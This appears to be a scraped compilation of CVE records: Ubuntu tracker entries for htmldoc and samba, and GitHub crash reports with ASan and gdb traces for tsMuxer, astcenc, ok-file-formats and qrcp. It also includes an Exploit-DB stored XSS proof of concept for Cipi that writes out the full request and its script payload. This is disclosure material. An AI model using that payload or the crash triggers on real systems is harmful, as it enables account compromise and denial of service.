A security issue was found in htmldoc v1.9.12 and before. A NULL pointer dereference in the function image_load_jpeg() in image.cxx may result in denial of service.

Published: **3 June 2021**

\[Unknown description\]

**Status**

Package

Release

Status

htmldoc  
Launchpad, Ubuntu, Debian

bionic

Needed  

focal

Needed  

groovy

Ignored (reached end-of-life)  

hirsute

Ignored (reached end-of-life)  

impish

Needed  

trusty

Does not exist  

upstream

Needs triage  

xenial

Ignored (out of standard support)  

**References**

*   https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-23191
*   https://github.com/michaelrsweet/htmldoc/issues/415
*   https://github.com/michaelrsweet/htmldoc/commit/369b2ea1fd0d0537ba707f20a2f047b6afd2fbdc
*   NVD
*   Launchpad
*   Debian

**Bugs**

*   http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=989437

CVE-2021-23191: CVE-2021-23191 | Ubuntu

A flaw was found in the way samba implemented DCE/RPC. If a client to a Samba server sent a very large DCE/RPC request, and chose to fragment it, an attacker could replace later fragments with their own data, bypassing the signature requirements.

Published: **9 November 2021**

Subsequent DCE/RPC fragment injection vulnerability. If a client to a Samba server sent a very large DCE/RPC request, and chose to fragment it, an attacker could replace later fragments with their own data, bypassing the signature requirements.

**Status**

Package

Release

Status

samba  
Launchpad, Ubuntu, Debian

bionic

Not vulnerable (2:4.7.6+dfsg~ubuntu-0ubuntu2.24)  

focal

Released (2:4.13.14+dfsg-0ubuntu0.20.04.1)  

hirsute

Released (2:4.13.14+dfsg-0ubuntu0.21.04.1)  

impish

Released (2:4.13.14+dfsg-0ubuntu0.21.10.1)  

trusty

Not vulnerable  

upstream

Released (4.13.14)  

xenial

Not vulnerable

CVE-2021-23192: CVE-2021-23192 | Ubuntu

tsMuxer git-2678966 was discovered to contain a heap-based buffer overflow via the function HevcUnit::updateBits in hevc.cpp.

Hi, I found a heap-buffer-overflow error.

**Some Info**

    Ubuntu 20.04.3 LTS
    tsMuxeR version git-2678966.
    

**To reproduce**

1.  Compile tsMuxer
2.  run tsmuxer

**Asan output**

    $ tsMuxer-asan ./poc  
    tsMuxeR version git-2678966. github.com/justdan96/tsMuxer
    This HEVC stream doesn't contain fps value. Muxing fps is absent too. Set muxing FPS to default 25.0 value.
    HEVC manual defined fps doesn't equal to stream fps. Change HEVC fps from 3.083 to 25
    =================================================================
    ==452652==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60d00000bd53 at pc 0x55fca9458e01 bp 0x7ffe07198940 sp 0x7ffe07198930
    READ of size 1 at 0x60d00000bd53 thread T0
        #0 0x55fca9458e00 in HevcUnit::updateBits(int, int, int) /path/to/tsMuxer/tsMuxer-asan/tsMuxer/hevc.cpp:76
        #1 0x55fca945ae43 in HevcVpsUnit::setFPS(double) /path/to/tsMuxer/tsMuxer-asan/tsMuxer/hevc.cpp:247
        #2 0x55fca946c904 in HEVCStreamReader::updateStreamFps(void*, unsigned char*, unsigned char*, int) /path/to/tsMuxer/tsMuxer-asan/tsMuxer/hevcStreamReader.cpp:364
        #3 0x55fca958cd7e in MPEGStreamReader::updateFPS(void*, unsigned char*, unsigned char*, int) /path/to/tsMuxer/tsMuxer-asan/tsMuxer/mpegStreamReader.cpp:310
        #4 0x55fca9469c00 in HEVCStreamReader::checkStream(unsigned char*, int) /path/to/tsMuxer/tsMuxer-asan/tsMuxer/hevcStreamReader.cpp:77
        #5 0x55fca94fb1dc in METADemuxer::detectTrackReader(unsigned char*, int, AbstractStreamReader::ContainerType, int, int) /path/to/tsMuxer/tsMuxer-asan/tsMuxer/metaDemuxer.cpp:771
        #6 0x55fca94f8ede in METADemuxer::DetectStreamReader(BufferedReaderManager&, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, bool) /path/to/tsMuxer/tsMuxer-asan/tsMuxer/metaDemuxer.cpp:685
        #7 0x55fca94a21d5 in detectStreamReader(char const*, MPLSParser*, bool) /path/to/tsMuxer/tsMuxer-asan/tsMuxer/main.cpp:120
        #8 0x55fca94a9d7b in main /path/to/tsMuxer/tsMuxer-asan/tsMuxer/main.cpp:699
        #9 0x7f2c99c360b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2)
        #10 0x55fca93b80ed in _start (/path/to/tsMuxer/tsMuxer-asan/build/tsMuxer/tsmuxer+0x28d0ed)
    
    0x60d00000bd53 is located 14 bytes to the right of 133-byte region [0x60d00000bcc0,0x60d00000bd45)
    allocated by thread T0 here:
        #0 0x7f2c9a35cb47 in operator new[](unsigned long) (/lib/x86_64-linux-gnu/libasan.so.5+0x10fb47)
        #1 0x55fca9458931 in HevcUnit::decodeBuffer(unsigned char const*, unsigned char const*) /path/to/tsMuxer/tsMuxer-asan/tsMuxer/hevc.cpp:40
        #2 0x55fca9469ac0 in HEVCStreamReader::checkStream(unsigned char*, int) /path/to/tsMuxer/tsMuxer-asan/tsMuxer/hevcStreamReader.cpp:73
        #3 0x55fca94fb1dc in METADemuxer::detectTrackReader(unsigned char*, int, AbstractStreamReader::ContainerType, int, int) /path/to/tsMuxer/tsMuxer-asan/tsMuxer/metaDemuxer.cpp:771
        #4 0x55fca94f8ede in METADemuxer::DetectStreamReader(BufferedReaderManager&, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, bool) /path/to/tsMuxer/tsMuxer-asan/tsMuxer/metaDemuxer.cpp:685
        #5 0x55fca94a21d5 in detectStreamReader(char const*, MPLSParser*, bool) /path/to/tsMuxer/tsMuxer-asan/tsMuxer/main.cpp:120
        #6 0x55fca94a9d7b in main /path/to/tsMuxer/tsMuxer-asan/tsMuxer/main.cpp:699
        #7 0x7f2c99c360b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2)
    
    SUMMARY: AddressSanitizer: heap-buffer-overflow /path/to/tsMuxer/tsMuxer-asan/tsMuxer/hevc.cpp:76 in HevcUnit::updateBits(int, int, int)
    Shadow bytes around the buggy address:
      0x0c1a7fff9750: fd fd fd fd fd fd fd fd fd fd fd fd fa fa fa fa
      0x0c1a7fff9760: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fd
      0x0c1a7fff9770: fd fd fd fd fd fd fa fa fa fa fa fa fa fa fd fd
      0x0c1a7fff9780: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
      0x0c1a7fff9790: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
    =>0x0c1a7fff97a0: 00 00 00 00 00 00 00 00 05 fa[fa]fa fa fa fa fa
      0x0c1a7fff97b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c1a7fff97c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c1a7fff97d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c1a7fff97e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c1a7fff97f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07
      Heap left redzone:       fa
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
      Shadow gap:              cc
    ==452652==ABORTING
    

**POC**  
poc.zip

CVE-2021-45863: heap-buffer-overflow in hevc.cpp:76 HevcUnit::updateBits · Issue #509 · justdan96/tsMuxer

There is an Assertion `num <= INT_BIT' failed at BitStreamReader::skipBits in /bitStream.h:132 of tsMuxer git-c6a0277.

Hi, I Found an Assertion Failed error.

**Some info:**

    Ubuntu 20.04.3 LTS
    tsMuxeR version git-c6a0277
    

**To reproduce**

1.  Compile tsMuxer
2.  Run tsmuxer

    tsmuxer ./poc
    tsMuxeR version git-c6a0277. github.com/justdan96/tsMuxer
    tsmuxer: tsMuxer/tsMuxer/bitStream.h:132: void BitStreamReader::skipBits(unsigned int): Assertion `num <= INT_BIT' failed.
    [1]    883819 abort (core dumped)  tsmuxer ./poc
    

**POC**  
poc.zip

**gdb output**

    gdb-peda$ r ./poc
    Starting program: tsMuxer/build/tsMuxer/tsmuxer ./poc
    [Thread debugging using libthread_db enabled]
    Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
    tsMuxeR version git-c6a0277. github.com/justdan96/tsMuxer
    tsmuxer: tsMuxer/tsMuxer/bitStream.h:132: void BitStreamReader::skipBits(unsigned int): Assertion `num <= INT_BIT' failed.
    
    Program received signal SIGABRT, Aborted.
    [----------------------------------registers-----------------------------------]
    RAX: 0x0
    RBX: 0x7ffff793f080 (0x00007ffff793f080)
    RCX: 0x7ffff79be18b (<__GI_raise+203>:	mov    rax,QWORD PTR [rsp+0x108])
    RDX: 0x0
    RSI: 0x7fffffff6ba0 --> 0x0
    RDI: 0x2
    RBP: 0x7ffff7b33588 ("%s%s%s:%u: %s%sAssertion `%s' failed.\n%n")
    RSP: 0x7fffffff6ba0 --> 0x0
    RIP: 0x7ffff79be18b (<__GI_raise+203>:	mov    rax,QWORD PTR [rsp+0x108])
    R8 : 0x0
    R9 : 0x7fffffff6ba0 --> 0x0
    R10: 0x8
    R11: 0x246
    R12: 0x555555832c90 ("tsMuxer/tsMuxer/bitStream.h")
    R13: 0x84
    R14: 0x555555832cc6 ("num <= INT_BIT")
    R15: 0x0
    EFLAGS: 0x246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow)
    [-------------------------------------code-------------------------------------]
       0x7ffff79be17f <__GI_raise+191>:	mov    edi,0x2
       0x7ffff79be184 <__GI_raise+196>:	mov    eax,0xe
       0x7ffff79be189 <__GI_raise+201>:	syscall
    => 0x7ffff79be18b <__GI_raise+203>:	mov    rax,QWORD PTR [rsp+0x108]
       0x7ffff79be193 <__GI_raise+211>:	xor    rax,QWORD PTR fs:0x28
       0x7ffff79be19c <__GI_raise+220>:	jne    0x7ffff79be1c4 <__GI_raise+260>
       0x7ffff79be19e <__GI_raise+222>:	mov    eax,r8d
       0x7ffff79be1a1 <__GI_raise+225>:	add    rsp,0x118
    [------------------------------------stack-------------------------------------]
    0000| 0x7fffffff6ba0 --> 0x0
    0008| 0x7fffffff6ba8 --> 0x7ffff7a15850 (<__GI___libc_free>:	endbr64)
    0016| 0x7fffffff6bb0 --> 0x7ffffbad8000
    0024| 0x7fffffff6bb8 --> 0x5555558ffcf0 --> 0x5555558ffd90 --> 0x0
    0032| 0x7fffffff6bc0 --> 0x5555558ffd55 ("signed int): Assertion `num <= INT_BIT' failed.\n")
    0040| 0x7fffffff6bc8 --> 0x5555558ffcf0 --> 0x5555558ffd90 --> 0x0
    0048| 0x7fffffff6bd0 --> 0x5555558ffcf0 --> 0x5555558ffd90 --> 0x0
    0056| 0x7fffffff6bd8 --> 0x5555558ffd85 --> 0xa1000000
    [------------------------------------------------------------------------------]
    Legend: code, data, rodata, value
    Stopped reason: SIGABRT
    __GI_raise (sig=sig@entry=0x6) at ../sysdeps/unix/sysv/linux/raise.c:50
    50	../sysdeps/unix/sysv/linux/raise.c: No such file or directory.
    gdb-peda$ bt
    #0  __GI_raise (sig=sig@entry=0x6) at ../sysdeps/unix/sysv/linux/raise.c:50
    #1  0x00007ffff799d859 in __GI_abort () at abort.c:79
    #2  0x00007ffff799d729 in __assert_fail_base (
        fmt=0x7ffff7b33588 "%s%s%s:%u: %s%sAssertion `%s' failed.\n%n",
        assertion=0x555555832cc6 "num <= INT_BIT",
        file=0x555555832c90 "tsMuxer/tsMuxer/bitStream.h", line=0x84,
        function=<optimized out>) at assert.c:92
    #3  0x00007ffff79aef36 in __GI___assert_fail (assertion=0x555555832cc6 "num <= INT_BIT",
        file=0x555555832c90 "tsMuxer/tsMuxer/bitStream.h", line=0x84,
        function=0x555555832cd8 "void BitStreamReader::skipBits(unsigned int)") at assert.c:101
    #4  0x00005555556c3395 in BitStreamReader::skipBits(unsigned int) ()
    #5  0x00005555557f233c in VvcUnitWithProfile::profile_tier_level(bool, int) ()
    #6  0x00005555557f3c36 in VvcSpsUnit::deserialize() ()
    #7  0x00005555557fa234 in VVCStreamReader::checkStream(unsigned char*, int) ()
    #8  0x0000555555742753 in METADemuxer::detectTrackReader(unsigned char*, int, AbstractStreamReader::ContainerType, int, int) ()
    #9  0x0000555555741afb in METADemuxer::DetectStreamReader(BufferedReaderManager&, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, bool) ()
    #10 0x000055555571ca8a in detectStreamReader(char const*, MPLSParser*, bool) ()
    #11 0x000055555571fafc in main ()
    #12 0x00007ffff799f0b3 in __libc_start_main (main=0x55555571ed30 <main>, argc=0x2,
        argv=0x7fffffffe318, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>,
        stack_end=0x7fffffffe308) at ../csu/libc-start.c:308
    #13 0x00005555556bac2e in _start ()
    gdb-peda$

CVE-2021-45861: Assertion Failed in bitStream.h:132 BitStreamReader::skipBits · Issue #478 · justdan96/tsMuxer

Cipi 3.1.15 allows Add Server stored XSS via the /api/servers name field.

    # Exploit Title: Cipi Control Panel 3.1.15 - Stored Cross-Site Scripting (XSS) (Authenticated)
    # Date: 24.02.2022
    # Exploit Author: Fikrat Ghuliev (Ghuliev)
    # Vendor Homepage: https://cipi.sh/ <https://www.aapanel.com/>
    # Software Link: https://cipi.sh/ <https://www.aapanel.com/>
    # Version: 3.1.15
    # Tested on: Ubuntu
    
    When the user wants to add a new server on the "Server" panel, in "name"
    parameter has not had any filtration.
    
    POST /api/servers HTTP/1.1
    Host: IP
    Content-Length: 102
    Accept: application/json
    X-Requested-With: XMLHttpRequest
    Authorization: Bearer
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
    (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36
    Content-Type: application/json
    Origin: http://IP
    Referer: http://IP/servers
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9
    Connection: close
    
    {
    "name":"\"><script>alert(1337)</script>",
    "ip":"10.10.10.10",
    "provider":"local",
    "location":"xss test"
    }

CVE-2022-26332: Offensive Security’s Exploit Database Archive

qrcp through 0.8.4, in receive mode, allows ../ Directory Traversal via the file name specified by the uploader.

While qrcp works on receive mode, uploader can edit the file name in HTTP request and add "../". Meanwhile, qrcp doesn't check legality of file name which lead to directory traversal.  
Env: qrcp-0.8.4, Windows 10 x86\_64, Ubuntu 20.04 x86\_64  
Poc:  
![image](https://user-images.githubusercontent.com/69268043/156000336-2b3019b6-4cdb-40ed-a305-4e48bf3628e9.png)  
![image](https://user-images.githubusercontent.com/69268043/156000944-8e1ab6e9-cbdd-42b2-8af2-839a5aff3036.png)  
![image](https://user-images.githubusercontent.com/69268043/156001182-98f2a234-a91e-4e34-b8aa-57d9082051c2.png)

credit: starryloki,lu0sf

CVE-2022-26315: Directory Traversal Vulnerability · Issue #223 · claudiodangelis/qrcp

ARM astcenc 3.2.0 is vulnerable to Buffer Overflow in function encode_ise().

**Version**

    astcenc v3.2.0, 64-bit sse2
    

**Environment**

Ubuntu 18.04，64 bit

**Command**

**Compile test program:**

$ mkdir build
$ cd build
$ cmake -G "Unix Makefiles" -DCMAKE\_BUILD\_TYPE=Release ..
$ make -j8

**Compile test program with address sanitizer:**

*   Update Makefile:

    $ set(CMAKE_C_COMPILER "/usr/bin/gcc")
    $ set(CMAKE_CXX_COMPILER "/usr/bin/g++")
    $ set(CMAKE_C_FLAGS "-fsanitize=address")
    $ set(CMAKE_CXX_FLAGS "-fsanitize=address")
    

*   Compile program:

    $ mkdir -p asan_build
    $ cd asan_build
    $ cmake -G "Unix Makefiles" -DCMAKE_BUILD_TYPE=Release ..
    $ make -j8
    

**Result**

The result of running without ASAN:

    $ ./astcenc-native -cl crash01 out1.astc 6x6 -medium
    
    Segmentation fault (core dumped)
    

Information obtained by using ASAN:

    $ ./astcenc-native_asan -cl crash01 out1.astc 6x6 -medium
    
    ==10804==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7f5352492320 at pc 0x5602c3a3f015 bp 0x7f53524921e0 sp 0x7f53524921d0
    READ of size 1 at 0x7f5352492320 thread T1
        #0 0x5602c3a3f014 in encode_ise(quant_method, unsigned int, unsigned char const*, unsigned char*, unsigned int) (/docker/astc_test/te/Source/astcenc-native+0xee014)
        #1 0x5602c39eb36c in symbolic_to_physical(block_size_descriptor const&, symbolic_compressed_block const&, physical_compressed_block&) (/docker/astc_test/te/Source/astcenc-native+0x9a36c)
        #2 0x5602c3a19b07 in compress_image(astcenc_context&, unsigned int, astcenc_image const&, astcenc_swizzle const&, unsigned char*) (/docker/astc_test/te/Source/astcenc-native+0xc8b07)
        #3 0x5602c3a1e382 in astcenc_compress_image(astcenc_context*, astcenc_image*, astcenc_swizzle const*, unsigned char*, unsigned long, unsigned int) (/docker/astc_test/te/Source/astcenc-native+0xcd382)
        #4 0x5602c39cdc33 in compression_workload_runner(int, int, void*) (/docker/astc_test/te/Source/astcenc-native+0x7cc33)
        #5 0x5602c39cac53 in launch_threads_helper(void*) [clone .lto_priv.0] (/docker/astc_test/te/Source/astcenc-native+0x79c53)
        #6 0x7f5357c45608 in start_thread (/lib/x86_64-linux-gnu/libpthread.so.0+0x9608)
        #7 0x7f53580d4292 in __clone (/lib/x86_64-linux-gnu/libc.so.6+0x122292)
    
    Address 0x7f5352492320 is located in stack of thread T1 at offset 96 in frame
        #0 0x5602c39ea13f in symbolic_to_physical(block_size_descriptor const&, symbolic_compressed_block const&, physical_compressed_block&) (/docker/astc_test/te/Source/astcenc-native+0x9913f)
    
      This frame has 3 object(s):
        [32, 48) 'weightbuf' (line 146)
        [64, 96) 'values_to_encode' (line 247) <== Memory access at offset 96 overflows this variable
        [128, 192) 'weights' (line 160)
    HINT: this may be a false positive if your program uses some custom stack unwind mechanism, swapcontext or vfork
          (longjmp and C++ exceptions *are* supported)
    Thread T1 created by T0 here:
        #0 0x7f53581fba95 in __interceptor_pthread_create (/lib/x86_64-linux-gnu/libasan.so.6+0x57a95)
        #1 0x5602c3a780b0 in launch_threads(int, void (*)(int, int, void*), void*) [clone .constprop.0] (/docker/astc_test/te/Source/astcenc-native+0x1270b0)
    
    SUMMARY: AddressSanitizer: stack-buffer-overflow (/docker/astc_test/te/Source/astcenc-native+0xee014) in encode_ise(quant_method, unsigned int, unsigned char const*, unsigned char*, unsigned int)
    Shadow bytes around the buggy address:
      0x0feaea48a410: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0feaea48a420: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0feaea48a430: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0feaea48a440: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0feaea48a450: 00 00 00 00 00 00 00 00 f1 f1 f1 f1 00 00 f2 f2
    =>0x0feaea48a460: 00 00 00 00[f2]f2 f2 f2 00 00 00 00 00 00 00 00
      0x0feaea48a470: f3 f3 f3 f3 00 00 00 00 00 00 00 00 00 00 00 00
      0x0feaea48a480: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0feaea48a490: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0feaea48a4a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0feaea48a4b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07 
      Heap left redzone:       fa
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
      Shadow gap:              cc
    ==10804==ABORTING
    

**Description**

    A stack-buffer-overflow was discovered in astcenc.The issue is being triggered in function encode_ise().
    

**Poc**

Poc file is this.

CVE-2021-44331: stack-buffer-overflow in function encode_ise() · Issue #294 · ARM-software/astc-encoder

David Brackeen ok-file-formats 203defd is vulnerable to Buffer Overflow via function ok_png_transform_scanline() in "/ok_png.c:494".

**Version**

203defd

**Environment**

Ubuntu 18.04，64 bit

**Testcase**

#include <stdio.h\>
#include <stdlib.h\>
#include "ok\_png.c" 
#include "ok\_png.h"

int main(int \_argc, char \*\*\_argv) {
    FILE \*file = fopen(\_argv\[1\], "rb");
    ok\_png image = ok\_png\_read(file, OK\_PNG\_COLOR\_FORMAT\_RGBA );
    fclose(file);
    if (image.data) {
        printf("Got image! Size: %li x %li\\n", (long)image.width, (long)image.height);
        free(image.data);
    }
    return 0;
}

**Command**

Compile test program:

    $ gcc -g -o main main.c ok_png.h
    

Compile test program with address sanitizer with this command:

    $ gcc -g -fsanitize=address -o asanpng main.c ok_png.h
    

**Result**

The result of running without ASAN:

    $ ./asanpng heap-buffer-overflow-7.png
    Segmentation fault (core dumped)
    

Information obtained by using ASAN:

    $ ./asanpng heap-buffer-overflow-7.png
    =================================================================
    ==1998==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x621000002500 at pc 0x0000004e3d62 bp 0x7ffe6e5d0b90 sp 0x7ffe6e5d0b88
    WRITE of size 1 at 0x621000002500 thread T0
        #0 0x4e3d61 in ok_png_transform_scanline /docker/ok-file-formats-png/ok_png.c:494:20
        #1 0x4e3d61 in ok_png_read_data /docker/ok-file-formats-png/ok_png.c:895:13
        #2 0x4e3d61 in ok_png_decode2 /docker/ok-file-formats-png/ok_png.c:971:23
        #3 0x4e3d61 in ok_png_decode /docker/ok-file-formats-png/ok_png.c:1025:5
        #4 0x4e81d5 in ok_png_read_with_allocator /docker/ok-file-formats-png/ok_png.c:188:9
        #5 0x4e81d5 in ok_png_read /docker/ok-file-formats-png/ok_png.c:177:12
        #6 0x4e81d5 in main /docker/ok-file-formats-png/main.c:8:20
        #7 0x7f5e82a180b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2)
        #8 0x41c38d in _start (/docker/ok-file-formats-png/afl_asan+0x41c38d)
    
    0x621000002500 is located 0 bytes to the right of 4096-byte region [0x621000001500,0x621000002500)
    allocated by thread T0 here:
        #0 0x4975ed in malloc (/docker/ok-file-formats-png/afl_asan+0x4975ed)
        #1 0x4cd004 in ok_png_read_data /docker/ok-file-formats-png/ok_png.c:774:29
        #2 0x4cd004 in ok_png_decode2 /docker/ok-file-formats-png/ok_png.c:971:23
        #3 0x4cd004 in ok_png_decode /docker/ok-file-formats-png/ok_png.c:1025:5
        #4 0x4e81d5 in ok_png_read_with_allocator /docker/ok-file-formats-png/ok_png.c:188:9
        #5 0x4e81d5 in ok_png_read /docker/ok-file-formats-png/ok_png.c:177:12
        #6 0x4e81d5 in main /docker/ok-file-formats-png/main.c:8:20
        #7 0x7f5e82a180b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2)
    
    SUMMARY: AddressSanitizer: heap-buffer-overflow /docker/ok-file-formats-png/ok_png.c:494:20 in ok_png_transform_scanline
    Shadow bytes around the buggy address:
      0x0c427fff8450: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c427fff8460: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c427fff8470: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c427fff8480: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c427fff8490: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    =>0x0c427fff84a0:[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c427fff84b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c427fff84c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c427fff84d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c427fff84e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c427fff84f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07
      Heap left redzone:       fa
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
      Shadow gap:              cc
    ==1998==ABORTING
    

**Description**

A heap-buffer-overflow was discovered in ok\_file\_formats. The issue is being triggered in function ok\_png\_transform\_scanline() at ok\_png.c:494:20

**Poc**

Poc file is this.

CVE-2021-44342: heap-buffer-overflow in function ok_png_transform_scanline() at  ok_png.c:494:20 · Issue #19 · brackeen/ok-file-formats

David Brackeen ok-file-formats 203defd is vulnerable to Buffer Overflow. When the function of the ok-file-formats project is used, a heap-buffer-overflow occurred in function ok_png_transform_scanline() in "/ok_png.c:712".

**Version**

203defd

**Environment**

Ubuntu 18.04，64 bit

**Testcase**

#include <stdio.h\>
#include <stdlib.h\>
#include "ok\_png.c" 
#include "ok\_png.h"

int main(int \_argc, char \*\*\_argv) {
    FILE \*file = fopen(\_argv\[1\], "rb");
    ok\_png image = ok\_png\_read(file, OK\_PNG\_COLOR\_FORMAT\_RGBA );
    fclose(file);
    if (image.data) {
        printf("Got image! Size: %li x %li\\n", (long)image.width, (long)image.height);
        free(image.data);
    }
    return 0;
}

**Command**

Compile test program:

    $ gcc -g -o main main.c ok_png.h
    

Compile test program with address sanitizer with this command:

    $ gcc -g -fsanitize=address -o asanpng main.c ok_png.h
    

**Result**

The result of running without ASAN:

    $ ./main heap-buffer-overflow-3.png
    free(): invalid pointer
    Aborted (core dumped)
    

Information obtained by using ASAN:

    $ ./asanpng heap-buffer-overflow-3.png
    ==8813==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x621000002680 at pc 0x0000004e48dc bp 0x7ffe51b2f890 sp 0x7ffe51b2f888
    WRITE of size 4 at 0x621000002680 thread T0
        #0 0x4e48db in ok_png_transform_scanline /docker/ok-file-formats-png/ok_png.c:712:13
        #1 0x4e48db in ok_png_read_data /docker/ok-file-formats-png/ok_png.c:895:13
        #2 0x4e48db in ok_png_decode2 /docker/ok-file-formats-png/ok_png.c:971:23
        #3 0x4e48db in ok_png_decode /docker/ok-file-formats-png/ok_png.c:1025:5
        #4 0x4e81d5 in ok_png_read_with_allocator /docker/ok-file-formats-png/ok_png.c:188:9
        #5 0x4e81d5 in ok_png_read /docker/ok-file-formats-png/ok_png.c:177:12
        #6 0x4e81d5 in main /docker/ok-file-formats-png/main.c:8:20
        #7 0x7fe87e6f50b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2)
        #8 0x41c38d in _start (/docker/ok-file-formats-png/afl_asan+0x41c38d)
    
    0x621000002680 is located 384 bytes to the right of 4096-byte region [0x621000001500,0x621000002500)
    allocated by thread T0 here:
        #0 0x4975ed in malloc (/docker/ok-file-formats-png/afl_asan+0x4975ed)
        #1 0x4cd004 in ok_png_read_data /docker/ok-file-formats-png/ok_png.c:774:29
        #2 0x4cd004 in ok_png_decode2 /docker/ok-file-formats-png/ok_png.c:971:23
        #3 0x4cd004 in ok_png_decode /docker/ok-file-formats-png/ok_png.c:1025:5
        #4 0x4e81d5 in ok_png_read_with_allocator /docker/ok-file-formats-png/ok_png.c:188:9
        #5 0x4e81d5 in ok_png_read /docker/ok-file-formats-png/ok_png.c:177:12
        #6 0x4e81d5 in main /docker/ok-file-formats-png/main.c:8:20
        #7 0x7fe87e6f50b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2)
    
    SUMMARY: AddressSanitizer: heap-buffer-overflow /docker/ok-file-formats-png/ok_png.c:712:13 in ok_png_transform_scanline
    Shadow bytes around the buggy address:
      0x0c427fff8480: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c427fff8490: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c427fff84a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c427fff84b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c427fff84c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
    =>0x0c427fff84d0:[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c427fff84e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c427fff84f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c427fff8500: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c427fff8510: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c427fff8520: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07
      Heap left redzone:       fa
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
